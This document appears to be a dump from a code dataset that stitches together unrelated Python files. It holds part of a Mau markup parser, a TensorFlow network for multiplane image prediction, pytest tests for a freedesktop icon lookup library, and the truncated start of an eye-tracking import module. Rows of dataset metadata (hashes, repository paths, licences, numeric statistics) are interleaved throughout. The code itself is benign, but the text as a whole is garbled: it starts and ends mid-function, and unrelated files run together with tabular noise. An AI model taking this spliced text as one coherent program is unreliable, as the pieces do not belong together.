# Get only letters, numbers, dashes, spaces, and dots
sanitised_text = "".join(re.findall("[a-z0-9-\\. ]+", sanitised_text))
# Remove multiple spaces
sanitised_text = "-".join(sanitised_text.split())
return sanitised_text
# The MainParser is in charge of parsing
# the whole input, calling other parsers
# to manage single paragraphs or other
# things like variables.
class MainParser(BaseParser):
def __init__(self, variables=None):
super().__init__()
self.lexer = MainLexer()
# This is used as a storage for attributes.
# Block attributes are defined before the block
# so when we parse them we store them here and
# then use them when dealing with the block itself.
self.argsparser = ArgumentsParser()
# Copy the variables and make sure the "mau" namespace exists
self.variables = copy.deepcopy(variables) if variables else {}
if "mau" not in self.variables:
self.variables["mau"] = {}
self.headers = []
self.footnote_defs = []
self.blocks = {}
self.toc = None
# When we define a block we establish an alias
# {alias:actual_block_name}
self.block_aliases = {}
# Each block we define can have default values
# {actual_block_name:kwargs}
self.block_defaults = {}
# Each block we define can have names for unnamed arguments
# {actual_block_name:kwargs}
self.block_names = {}
# Backward compatibility with Mau 1.x
# Mau 1.x used [source] to format source, while Mau 2.x
# uses [myblock, engine=source], so this establishes
# a default block definition so that
# [source] = [source, engine=source]
# In Mau 2.x this block uses the template "block-source"
# so any template called "source" (e.g. "source.html")
# must be renamed.
# This definition can be overridden by custom block definitions
self.block_aliases["source"] = "source"
self.block_defaults["source"] = {"engine": "source", "language": "text"}
self.block_names["source"] = ["language"]
self.block_aliases["admonition"] = "admonition"
self.block_names["admonition"] = ["class", "icon", "label"]
self.block_aliases["quote"] = "quote"
self.block_defaults["quote"] = {"attribution": None}
self.block_names["quote"] = ["attribution"]
# Iterate through block definitions passed as variables
for alias, block_definition in (
self.variables["mau"].get("block_definitions", {}).items()
):
try:
blocktype = block_definition["blocktype"]
self.block_aliases[alias] = blocktype
except KeyError:
raise ConfigurationError(
f"Block definition '{alias}' is missing key 'blocktype'"
)
try:
self.block_defaults[blocktype] = block_definition["kwargs"]
except KeyError:
raise ConfigurationError(
f"Block definition '{alias}' is missing key 'kwargs'"
)
# This is a buffer for a block title
self._title = None
# This is the function used to create the header
# anchors. It can be specified through
# mau.header_anchor_function to override
# the default one.
self.header_anchor = self.variables["mau"].get(
"header_anchor_function", header_anchor
)
self.v1_backward_compatibility = self.variables["mau"].get(
"v1_backward_compatibility", False
)
def _pop_title(self):
# This return the title and resets the
# cached one, so no other block will
# use it.
title = self._title
self._title = None
return title
def _push_title(self, title):
# When we parse a title we can store it here
# so that it is available to the next block
# that will use it.
self._title = title
def _collect_lines(self, stop_tokens):
# This collects several lines of text in a list
# until it gets to a line that begins with one
# of the tokens listed in stop_tokens.
# It is useful for block or other elements that
# are clearly surrounded by delimiters.
lines = []
while self.peek_token() not in stop_tokens:
lines.append(self.collect_join([Token(TokenTypes.EOL)]))
self.get_token(TokenTypes.EOL)
return lines
def _collect_text_content(self):
# Collects all adjacent text tokens
# into a single string
if not self.peek_token_is(TokenTypes.TEXT):
return None
values = []
# Get all tokens
while self.peek_token_is(TokenTypes.TEXT):
values.append(self.get_token().value)
self.get_token(TokenTypes.EOL)
return " ".join(values)
def _parse_text_content(self, text):
# Parse a text using the TextParser.
# Replace variables
p = PreprocessVariablesParser(self.variables).analyse(
text,
)
text = p.nodes[0].value
# Parse the text
p = TextParser(
footnotes_start_with=len(self.footnote_defs) + 1,
v1_backward_compatibility=self.v1_backward_compatibility,
).analyse(text)
# Text should return a single sentence node
result = p.nodes[0]
# Store the footnotes
self.footnote_defs.extend(p.footnote_defs)
return result
@parser
def _parse_eol(self):
# This simply parses the end of line.
self.get_token(TokenTypes.EOL)
@parser
def _parse_horizontal_rule(self):
# The horizontal rule ---
self.get_token(TokenTypes.LITERAL, "---")
self.get_token(TokenTypes.EOL)
self._save(HorizontalRuleNode())
@parser
def _parse_single_line_comment(self):
# // A comment on a single line
self.get_token(TokenTypes.TEXT, check=lambda x: x.startswith("//"))
self.get_token(TokenTypes.EOL)
@parser
def _parse_multi_line_comment(self):
# ////
# A comment
# on multiple lines
# ////
self.get_token(TokenTypes.LITERAL, "////")
self._collect_lines([Token(TokenTypes.LITERAL, "////"), Token(TokenTypes.EOF)])
self.force_token(TokenTypes.LITERAL, "////")
@parser
def _parse_variable_definition(self):
# This parses a variable definition
#
# Simple variables are defined as :name:value
# as True booleans as just :name:
# and as False booleas as :!name:
#
# Variable names can use a namespace with
# :namespace.name:value
# Get the mandatory variable name
self.get_token(TokenTypes.LITERAL, ":")
variable_name = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.LITERAL, ":")
# Assume the variable is a flag
variable_value = True
# If the name starts with ! it's a false flag
if variable_name.startswith("!"):
variable_value = False
variable_name = variable_name[1:]
# Get the optional value
value = self.collect_join([Token(TokenTypes.EOL)])
# The value is assigned only if the variable
# is not a negative flag. In that case it is ignored
if variable_value and len(value) > 0:
variable_value = value
# If the variable name contains a dot we
# want to use a namespace
if "." not in variable_name:
self.variables[variable_name] = variable_value
else:
# Let's ignore all others dots
namespace, variable_name = variable_name.split(".", maxsplit=1)
# This defines the namespace if it's not already there
try:
self.variables[namespace][variable_name] = variable_value
except KeyError:
self.variables[namespace] = {variable_name: variable_value}
@parser
def _parse_command(self):
# Parse a command in the form ::command:
self.get_token(TokenTypes.LITERAL, "::")
name = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.LITERAL, ":")
args = []
kwargs = {}
# Commands can have arguments
with self:
arguments = self.get_token(TokenTypes.TEXT).value
self.argsparser.analyse(arguments)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
if name == "defblock":
# Block definitions must have at least 2 arguments,
# the alias and the block type.
if len(args) < 2:
self.error(
"Block definitions require at least two unnamed arguments: ALIAS and BLOCKTYPE"
)
block_alias = args.pop(0)
block_type = args.pop(0)
self.block_aliases[block_alias] = block_type
self.block_defaults[block_type] = kwargs
self.block_names[block_type] = args
return None
self._save(CommandNode(name=name, args=args, kwargs=kwargs))
@parser
def _parse_title(self):
# Parse a title in the form
#
# . This is a title
# or
# .This is a title
# Parse the mandatory dot
self.get_token(TokenTypes.LITERAL, ".")
# Parse the optional white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
# Get the text of the title
text = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.EOL)
# Titles can contain Mau code
p = TextParser(
footnotes_start_with=len(self.footnote_defs) + 1,
v1_backward_compatibility=self.v1_backward_compatibility,
).analyse(text)
title = p.nodes[0]
self._push_title(title)
@parser
def _parse_attributes(self):
# Parse block attributes in the form
# [unnamed1, unnamed2, ..., named1=value1, name2=value2, ...]
self.get_token(TokenTypes.LITERAL, "[")
attributes = self.get_token(TokenTypes.TEXT).value
self.get_token(TokenTypes.LITERAL, "]")
# Attributes can use variables
p = PreprocessVariablesParser(self.variables).analyse(
attributes,
)
attributes = p.nodes[0].value
# Parse the arguments
self.argsparser.analyse(attributes)
@parser
def _parse_header(self):
# Parse a header in the form
#
# = Header
#
# The number of equal signs is arbitrary
# and represents the level of the header.
# Headers are automatically assigned an anchor
# created using the provided function self.header_anchor
#
# Headers in the form
# =! Header
# are rendered but not included in the TOC
# Get all the equal signs
header = self.get_token(
TokenTypes.LITERAL, check=lambda x: x.startswith("=")
).value
# Get the mandatory white spaces
self.get_token(TokenTypes.WHITESPACE)
# Check if the header has to be in the TOC
in_toc = True
if header.endswith("!"):
header = header[:-1]
in_toc = False
# Get the text of the header and calculate the level
text = self.get_token(TokenTypes.TEXT).value
level = len(header)
# Generate the anchor and append it to the TOC
anchor = self.header_anchor(text, level)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
# Generate the header node
header_node = HeaderNode(value=text, level=level, anchor=anchor, kwargs=kwargs)
if in_toc:
self.headers.append(header_node)
self._save(header_node)
@parser
def _parse_block(self):
# Parse a block in the form
#
# [block_type]
# ----
# Content
# ----
# Optional secondary content
#
# Blocks are delimited by 4 consecutive identical characters.
# Get the delimiter and check the length
delimiter = self.get_token(TokenTypes.TEXT).value
if len(delimiter) != 4 or len(set(delimiter)) != 1:
raise TokenError
self.get_token(TokenTypes.EOL)
# Collect everything until the next delimiter
content = self._collect_lines(
[Token(TokenTypes.TEXT, delimiter), Token(TokenTypes.EOF)]
)
self.force_token(TokenTypes.TEXT, delimiter)
self.get_token(TokenTypes.EOL)
# Get the optional secondary content
secondary_content = self._collect_lines(
[Token(TokenTypes.EOL), Token(TokenTypes.EOF)]
)
# Consume the title
title = self._pop_title()
# The first unnamed argument is the block type
blocktype = self.argsparser.pop()
# If there is a block alias for blocktype replace it
# otherwise use the blocktype we already have
blocktype = self.block_aliases.get(blocktype, blocktype)
# Assign names
self.argsparser.set_names_and_defaults(
self.block_names.get(blocktype, []), self.block_defaults.get(blocktype, {})
)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
# Extract classes and convert them into a list
classes = [i for i in kwargs.pop("classes", "").split(",") if len(i) > 0]
# Extract condition if present and process it
condition = kwargs.pop("condition", "")
# Run this only if there is a condition on this block
if len(condition) > 0:
try:
# The condition should be either test:variable:value or test:variable:
test, variable, value = condition.split(":")
except ValueError:
self.error(
f'Condition {condition} is not in the form "test:variable:value" or "test:variable:'
)
# If there is no value use True
if len(value) == 0:
value = True
# Check if the variable matches the value and apply the requested test
match = self.variables.get(variable) == value
result = True if test == "if" else False
# If the condition is not satisfied return
if match is not result:
return
# Extract the preprocessor
preprocessor = kwargs.pop("preprocessor", "none")
# Extract the engine
engine = kwargs.pop("engine", "default")
# Create the node parameters according to the engine
if engine in ["raw", "mau"]:
# Engine "raw" doesn't process the content,
# so we just pass it untouched in the form of
# a TextNode per line. The same is true for "mau"
# as the visitor will have to fire up an new parser
# to process the content.
content = [TextNode(line) for line in content]
secondary_content = [TextNode(line) for line in secondary_content]
elif engine == "source":
# Engine "source" extracts the content (source code),
# the callouts, and the highlights.
# The default language is "text".
content, callouts, highlights = self._parse_source_engine(
content, secondary_content, kwargs
)
secondary_content = []
kwargs["callouts"] = callouts
kwargs["highlights"] = highlights
kwargs["language"] = kwargs.get("language", "text")
elif engine == "default":
# This is the default engine and it parses
# both content and secondary content using a new parser
# but then merges headers and footnotes into the
# current one.
# Parse the primary and secondary content and record footnotes
pc = MainParser(variables=self.variables).analyse("\n".join(content))
ps = MainParser(variables=self.variables).analyse(
"\n".join(secondary_content)
)
content = pc.nodes
secondary_content = ps.nodes
self.footnote_defs.extend(pc.footnote_defs)
self.headers.extend(pc.headers)
else:
raise EngineError(f"Engine {engine} is not available")
self._save(
BlockNode(
blocktype=blocktype,
content=content,
secondary_content=secondary_content,
args=args,
classes=classes,
engine=engine,
preprocessor=preprocessor,
kwargs=kwargs,
title=title,
)
)
def _parse_source_engine(self, content, secondary_content, kwargs):
# Parse a source block in the form
#
# [source, language, attributes...]
# ----
# content
# ----
#
# Source blocks support the following attributes
#
# callouts=":" The separator used by callouts
# highlight="@" The special character to turn on highlight
#
# [source, language, attributes...]
# ----
# content:1:
# ----
#
# [source, language, attributes...]
# ----
# content:@:
# ----
#
# Callout descriptions can be added to the block
# as secondary content with the syntax
#
# [source, language, attributes...]
# ----
# content:name:
# ----
# <name>: <description>
#
# Since Mau uses Pygments, the attribute language
# is one of the langauges supported by that tool.
# Get the delimiter for callouts (":" by default)
delimiter = kwargs.pop("callouts", ":")
# A dictionary that contains callout markers in
# the form {linenum:name}
callout_markers = {}
# Get the marker for highlighted lines ("@" by default)
highlight_marker = kwargs.pop("highlight", "@")
# A list of highlighted lines
highlighted_lines = []
# This is a list of all lines that might contain
# a callout. They will be further processed
# later to be sure.
lines_with_callouts = [
(linenum, line)
for linenum, line in enumerate(content)
if line.endswith(delimiter)
]
# Each line in the previous list is processed
# and stored if it contains a callout
for linenum, line in lines_with_callouts:
# Remove the final delimiter
line = line[:-1]
splits = line.split(delimiter)
if len(splits) < 2:
# It's a trap! There are no separators left
continue
# Get the callout and the line
callout_name = splits[-1]
line = delimiter.join(splits[:-1])
content[linenum] = line
# Check if we want to just highlight the line
if callout_name == highlight_marker:
highlighted_lines.append(linenum)
else:
callout_markers[linenum] = callout_name
# A dictionary that contains the text for each
# marker in the form {name:text}
callout_contents = {}
# If there was secondary content it should be formatted
# with callout names followed by colon and the
# callout text.
for line in secondary_content:
if ":" not in line:
self.error(
f"Callout description should be written as 'name: text'. Missing ':' in '{line}'"
)
name, text = line.split(":")
if name not in callout_markers.values():
self.error(f"Callout {name} has not been created in the source code")
text = text.strip()
callout_contents[name] = text
# Put markers and contents together
callouts = {"markers": callout_markers, "contents": callout_contents}
# Source blocks must preserve the content literally
textlines = [TextNode(line) for line in content]
return textlines, callouts, highlighted_lines
# self._save(
# SourceNode(
# language,
# callouts=callouts,
# highlights=highlighted_lines,
# delimiter=delimiter,
# code=textlines,
# title=title,
# kwargs=kwargs,
# )
# )
@parser
def _parse_content(self):
# Parse attached content in the form
#
# [attributes]
# << content_type:uri
# Get the mandatory "<<" and white spaces
self.get_token(TokenTypes.LITERAL, check=lambda x: x.startswith("<<"))
self.get_token(TokenTypes.WHITESPACE)
# Get the content type and the content URI
content_type_and_uri = self.get_token(TokenTypes.TEXT).value
content_type, uri = content_type_and_uri.split(":", maxsplit=1)
title = self._pop_title()
if content_type == "image":
return self._parse_content_image(uri, title)
return self._parse_standard_content(content_type, uri, title)
def _parse_content_image(self, uri, title):
# Parse a content image in the form
#
# [alt_text, classes]
# << image:uri
#
# alt_text is the alternate text to use is the image is not reachable
# and classes is a comma-separated list of classes
# Assign names and consume the attributes
self.argsparser.set_names_and_defaults(
["alt_text", "classes"], {"alt_text": None, "classes": None}
)
args, kwargs = self.argsparser.get_arguments_and_reset()
alt_text = kwargs.pop("alt_text")
classes = kwargs.pop("classes")
if classes:
classes = classes.split(",")
self._save(
ContentImageNode(
uri=uri,
alt_text=alt_text,
classes=classes,
title=title,
kwargs=kwargs,
)
)
def _parse_standard_content(self, content_type, uri, title):
# This is the fallback for an unknown content type
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
self._save(
ContentNode(
uri=uri,
title=title,
args=args,
kwargs=kwargs,
)
)
@parser
def _parse_list(self):
# Parse a list.
# Lists can be ordered (using numbers)
#
# * One item
# * Another item
#
# or unordered (using bullets)
#
# # Item 1
# # Item 2
#
# The number of headers increases
# the depth of each item
#
# # Item 1
# ## Sub-Item 1.1
#
# Spaces before and after the header are ignored.
# So the previous list can be also written
#
# # Item 1
# ## Sub-Item 1.1
#
# Ordered and unordered lists can be mixed.
#
# * One item
# ## Sub Item 1
# ## Sub Item 2
#
# Ignore initial white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
# Get the header and decide if it's a numbered or unnumbered list
header = self.peek_token(TokenTypes.LITERAL, check=lambda x: x[0] in "*#")
numbered = True if header.value[0] == "#" else False
# Parse all the following items
nodes = self._parse_list_nodes()
self._save(ListNode(numbered, nodes, main_node=True))
def _parse_list_nodes(self):
# This parses all items of a list
# Ignore initial white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
# Parse the header and ignore the following white spaces
header = self.get_token(TokenTypes.LITERAL, check=lambda x: x[0] in "*#").value
self.get_token(TokenTypes.WHITESPACE)
# Collect and parse the text of the item
text = self._collect_text_content()
content = self._parse_text_content(text)
# Compute the level of the item
level = len(header)
nodes = []
nodes.append(ListItemNode(level, content))
while not self.peek_token() in [Token(TokenTypes.EOF), Token(TokenTypes.EOL)]:
# This is the SentenceNode inside the last node added to the list
# which is used to append potential nested nodes
last_node_sentence = nodes[-1].content
# Ignore the initial white spaces
with self:
self.get_token(TokenTypes.WHITESPACE)
if len(self.peek_token().value) == level:
# The new item is on the same level
# Get the header
header = self.get_token().value
# Ignore white spaces
self.get_token(TokenTypes.WHITESPACE)
# Collect and parse the text of the item
text = self._collect_text_content()
content = self._parse_text_content(text)
nodes.append(ListItemNode(len(header), content))
elif len(self.peek_token().value) > level:
# The new item is on a deeper level
# Treat the new line as a new list
numbered = True if self.peek_token().value[0] == "#" else False
subnodes = self._parse_list_nodes()
last_node_sentence.content.append(ListNode(numbered, subnodes))
else:
break
return nodes
@parser
def _parse_paragraph(self):
# This parses a paragraph.
# Paragraphs can be written on multiple lines and
# end with an empty line.
# Get all the lines, join them and parse them
lines = self._collect_lines([Token(TokenTypes.EOL), Token(TokenTypes.EOF)])
text = " ".join(lines)
sentence = self._parse_text_content(text)
# Consume the attributes
args, kwargs = self.argsparser.get_arguments_and_reset()
self._save(ParagraphNode(sentence, args=args, kwargs=kwargs))
def _parse_functions(self):
# All the functions that this parser provides.
return [
self._parse_eol,
self._parse_horizontal_rule,
self._parse_single_line_comment,
self._parse_multi_line_comment,
self._parse_variable_definition,
self._parse_command,
self._parse_title,
self._parse_attributes,
self._parse_header,
self._parse_block,
self._parse_content,
self._parse_list,
self._parse_paragraph,
]
def _create_toc(self):
# Create the TOC from the list of headers.
nodes = []
latest_by_level = {}
for header_node in self.headers:
# This is the current node
node = TocEntryNode(header_node)
level = header_node.level
# This collects the latest node added with a given level
latest_by_level[level] = node
try:
# Simplest case, add it to the latest one
# with a level just 1 step lower
latest_by_level[level - 1].children.append(node)
except KeyError:
# Find all the latest ones added with a level lower than this
latest = [latest_by_level.get(i, None) for i in range(1, level)]
# Get the children list of each one, plus nodes for the root
children = [nodes] + [i.children for i in latest if i is not None]
# Get the nearest one and append to that
children[-1].append(node)
return TocNode(entries=nodes)
def parse(self):
super().parse()
self.toc = self._create_toc()
self.footnotes = FootnotesNode(entries=self.footnote_defs)
| 32.136659
| 104
| 0.583463
| 3,356
| 29,630
| 5.029201
| 0.145113
| 0.046214
| 0.027728
| 0.048228
| 0.232255
| 0.206067
| 0.145396
| 0.117075
| 0.111151
| 0.09859
| 0
| 0.003189
| 0.333277
| 29,630
| 921
| 105
| 32.171553
| 0.851177
| 0.29811
| 0
| 0.238532
| 0
| 0.002294
| 0.045046
| 0.003322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061927
| false
| 0
| 0.020642
| 0.002294
| 0.119266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888b41cc12274148e790e361bed90e406da76010
| 3,344
|
py
|
Python
|
stereomag/nets.py
|
MandyMY/stereo-magnification
|
c18fa484484597dfa653f317459a503d9bf8d933
|
[
"Apache-2.0"
] | null | null | null |
stereomag/nets.py
|
MandyMY/stereo-magnification
|
c18fa484484597dfa653f317459a503d9bf8d933
|
[
"Apache-2.0"
] | null | null | null |
stereomag/nets.py
|
MandyMY/stereo-magnification
|
c18fa484484597dfa653f317459a503d9bf8d933
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Network definitions for multiplane image (MPI) prediction networks.
"""
from __future__ import division
import numpy as np
#import tensorflow as tf
import tensorflow.compat.v1 as tf
#from tensorflow.contrib import slim
import tf_slim as slim
def mpi_net(inputs, num_outputs, ngf=64, vscope='net', reuse_weights=False):
"""Network definition for multiplane image (MPI) inference.
Args:
inputs: stack of input images [batch, height, width, input_channels]
num_outputs: number of output channels
ngf: number of features for the first conv layer
vscope: variable scope
reuse_weights: whether to reuse weights (for weight sharing)
Returns:
pred: network output at the same spatial resolution as the inputs.
"""
with tf.variable_scope(vscope, reuse=reuse_weights):
with slim.arg_scope(
[slim.conv2d, slim.conv2d_transpose], normalizer_fn=slim.layer_norm):
cnv1_1 = slim.conv2d(inputs, ngf, [3, 3], scope='conv1_1', stride=1)
cnv1_2 = slim.conv2d(cnv1_1, ngf * 2, [3, 3], scope='conv1_2', stride=2)
cnv2_1 = slim.conv2d(cnv1_2, ngf * 2, [3, 3], scope='conv2_1', stride=1)
cnv2_2 = slim.conv2d(cnv2_1, ngf * 4, [3, 3], scope='conv2_2', stride=2)
cnv3_1 = slim.conv2d(cnv2_2, ngf * 4, [3, 3], scope='conv3_1', stride=1)
cnv3_2 = slim.conv2d(cnv3_1, ngf * 4, [3, 3], scope='conv3_2', stride=1)
cnv3_3 = slim.conv2d(cnv3_2, ngf * 8, [3, 3], scope='conv3_3', stride=2)
cnv4_1 = slim.conv2d(
cnv3_3, ngf * 8, [3, 3], scope='conv4_1', stride=1, rate=2)
cnv4_2 = slim.conv2d(
cnv4_1, ngf * 8, [3, 3], scope='conv4_2', stride=1, rate=2)
cnv4_3 = slim.conv2d(
cnv4_2, ngf * 8, [3, 3], scope='conv4_3', stride=1, rate=2)
# Adding skips
skip = tf.concat([cnv4_3, cnv3_3], axis=3)
cnv6_1 = slim.conv2d_transpose(
skip, ngf * 4, [4, 4], scope='conv6_1', stride=2)
cnv6_2 = slim.conv2d(cnv6_1, ngf * 4, [3, 3], scope='conv6_2', stride=1)
cnv6_3 = slim.conv2d(cnv6_2, ngf * 4, [3, 3], scope='conv6_3', stride=1)
skip = tf.concat([cnv6_3, cnv2_2], axis=3)
cnv7_1 = slim.conv2d_transpose(
skip, ngf * 2, [4, 4], scope='conv7_1', stride=2)
cnv7_2 = slim.conv2d(cnv7_1, ngf * 2, [3, 3], scope='conv7_2', stride=1)
skip = tf.concat([cnv7_2, cnv1_2], axis=3)
cnv8_1 = slim.conv2d_transpose(
skip, ngf, [4, 4], scope='conv8_1', stride=2)
cnv8_2 = slim.conv2d(cnv8_1, ngf, [3, 3], scope='conv8_2', stride=1)
feat = cnv8_2
pred = slim.conv2d(
feat,
num_outputs, [1, 1],
stride=1,
activation_fn=tf.nn.tanh,
normalizer_fn=None,
scope='color_pred')
return pred
| 39.809524
| 78
| 0.650718
| 533
| 3,344
| 3.93621
| 0.300188
| 0.095329
| 0.046711
| 0.014299
| 0.157769
| 0.119161
| 0.027645
| 0.027645
| 0
| 0
| 0
| 0.081516
| 0.2186
| 3,344
| 83
| 79
| 40.289157
| 0.721393
| 0.32805
| 0
| 0
| 0
| 0
| 0.060027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.093023
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
888c285859f9179b927cbdc06da726b52d44b5cf
| 3,731
|
py
|
Python
|
tests/test_init.py
|
ashb/freedesktop-icons
|
10737b499bff9a22c853aa20822215c8e059a737
|
[
"MIT"
] | 1
|
2021-06-02T11:11:50.000Z
|
2021-06-02T11:11:50.000Z
|
tests/test_init.py
|
ashb/freedesktop-icons
|
10737b499bff9a22c853aa20822215c8e059a737
|
[
"MIT"
] | null | null | null |
tests/test_init.py
|
ashb/freedesktop-icons
|
10737b499bff9a22c853aa20822215c8e059a737
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from unittest import mock
import pytest
from freedesktop_icons import Icon, Theme, lookup, lookup_fallback, theme_search_dirs
@pytest.mark.parametrize(
("env", "expected"),
(
("", [Path.home() / '.icons']),
("/foo:", [Path.home() / '.icons', Path('/foo/icons')]),
),
)
def test_theme_search_dirs(env, expected, monkeypatch):
monkeypatch.setenv('XDG_DATA_DIRS', env)
assert list(theme_search_dirs()) == expected
def _stub_get_theme(get_theme, **kwargs):
get_theme.side_effect = kwargs.get
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = ['parent', 'hicolor']
_stub_get_theme(get_theme, Adwaita=real_theme)
lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita')]
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup_icon(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = []
_stub_get_theme(get_theme, Adwaita=real_theme)
icon = Icon("org.mozilla.firefox")
lookup(icon, "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita')]
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup_in_parent(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = ['parent']
real_theme.lookup.return_value = None
parent_theme = mock.create_autospec(Theme, name="parent_theme")
_stub_get_theme(get_theme, Adwaita=real_theme, parent=parent_theme)
lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita'), mock.call('parent')]
@mock.patch("freedesktop_icons.get_theme", autospec=True)
def test_lookup_in_hicolor(get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.parents = ['parent']
real_theme.lookup.return_value = None
parent_theme = mock.create_autospec(Theme, name="parent_theme")
parent_theme.lookup.return_value = None
hicolor = mock.create_autospec(Theme, name="hicolor")
hicolor.lookup.return_value = mock.MagicMock()
_stub_get_theme(get_theme, Adwaita=real_theme, parent=parent_theme, hicolor=hicolor)
path = lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita'), mock.call('parent'), mock.call('hicolor')]
assert path is hicolor.lookup.return_value
@mock.patch("freedesktop_icons.get_theme", autospec=True)
@mock.patch("freedesktop_icons.lookup_fallback", autospec=True)
def test_lookup_in_fallback(lookup_fallback, get_theme):
real_theme = mock.create_autospec(Theme, name="real_theme")
real_theme.lookup.return_value = None
hicolor = mock.create_autospec(Theme, name="hicolor")
hicolor.lookup.return_value = None
_stub_get_theme(get_theme, Adwaita=real_theme, hicolor=hicolor)
lookup_fallback.return_value = mock.MagicMock()
path = lookup("org.mozilla.firefox", "Adwaita")
assert get_theme.mock_calls == [mock.call('Adwaita'), mock.call('hicolor')]
assert lookup_fallback.mock_calls == [mock.call('org.mozilla.firefox', ['svg', 'png', 'xpm'])]
assert path is lookup_fallback.return_value
@mock.patch("freedesktop_icons.fallback_paths")
def test_lookup_fallback(fallback_paths, tmpdir):
file = tmpdir / 'org.mozilla.firefox.svg'
file.open('w').close()
fallback_paths.return_value = [tmpdir]
assert lookup_fallback("not-there", ['svg']) is None
assert lookup_fallback("org.mozilla.firefox", ['png']) is None
assert lookup_fallback("org.mozilla.firefox", ['svg']) == file
| 35.198113
| 100
| 0.729027
| 498
| 3,731
| 5.184739
| 0.13253
| 0.086754
| 0.054222
| 0.08017
| 0.705655
| 0.662665
| 0.634005
| 0.634005
| 0.543377
| 0.543377
| 0
| 0
| 0.1316
| 3,731
| 105
| 101
| 35.533333
| 0.796914
| 0
| 0
| 0.364865
| 0
| 0
| 0.1777
| 0.05977
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.108108
| false
| 0
| 0.054054
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8890ba16069cecd8d4ab8ea601bde0d4759bc1b2
| 15,223
|
py
|
Python
|
code/functions/et_import.py
|
behinger/etcomp
|
f30389da49c3416c7a723d44951d197d6e89d40e
|
[
"MIT"
] | 20
|
2018-08-08T07:08:46.000Z
|
2022-03-07T14:49:06.000Z
|
code/functions/et_import.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 32
|
2017-12-05T14:05:48.000Z
|
2020-10-20T10:29:43.000Z
|
code/functions/et_import.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 7
|
2018-12-09T22:53:10.000Z
|
2021-11-10T09:13:04.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import os
import logging
from functions.et_helper import findFile,gaze_to_pandas
import functions.et_parse as parse
import functions.et_make_df as make_df
import functions.et_helper as helper
import imp # for edfread reload
import scipy
import scipy.stats
#%% PUPILLABS
def pl_fix_timelag(pl):
#fixes the pupillabs latency lag (which can be super large!!)
t_cam = np.asarray([p['recent_frame_timestamp'] for p in pl['notifications'] if p['subject']=='trigger'])# camera time
t_msg = np.asarray([p['timestamp'] for p in pl['notifications'] if p['subject']=='trigger']) # msg time
#slope, intercept, r_value, p_value, std_err = scipy.stats.linregress(t_msg,t_cam) # predict camera time based on msg time
slope,intercept,low,high = scipy.stats.theilslopes(t_cam,t_msg)
logger = logging.getLogger(__name__)
logger.warning("fixing lag (at t=0) of :%.2fms, slope of %.7f (in a perfect world this is 0ms & 1.0)"%(intercept*1000,slope))
# fill it back in
# gonna do it with a for-loop because other stuff is too voodo or not readable for me
# Use this code (and change t_cam and t_msg above) if you want everything in computer time timestamps
#for ix,m in enumerate(pl['gaze_positions']):
# pl['gaze_positions'][ix]['timestamp'] = pl['gaze_positions'][ix]['timestamp'] * slope + intercept
# for ix2,m2 in enumerate(pl['gaze_positions'][ix]['pupil_positions']):
# pl['gaze_positions'][ix]['pupil_positions']['timestamp'] = pl['gaze_positions'][ix]['pupil_positions']['timestamp'] * slope + intercept
#for ix,m in enumerate(pl['gaze_positions']):
